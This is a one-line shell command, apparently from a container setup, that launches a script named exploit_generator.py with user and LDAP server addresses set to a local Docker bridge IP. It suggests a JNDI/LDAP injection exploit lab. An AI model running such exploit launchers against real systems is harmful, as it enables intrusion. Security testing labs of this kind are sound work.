exec python3 exploit_generator.py --userip '172.17.0.1' --ldapip '172.17.0.1'
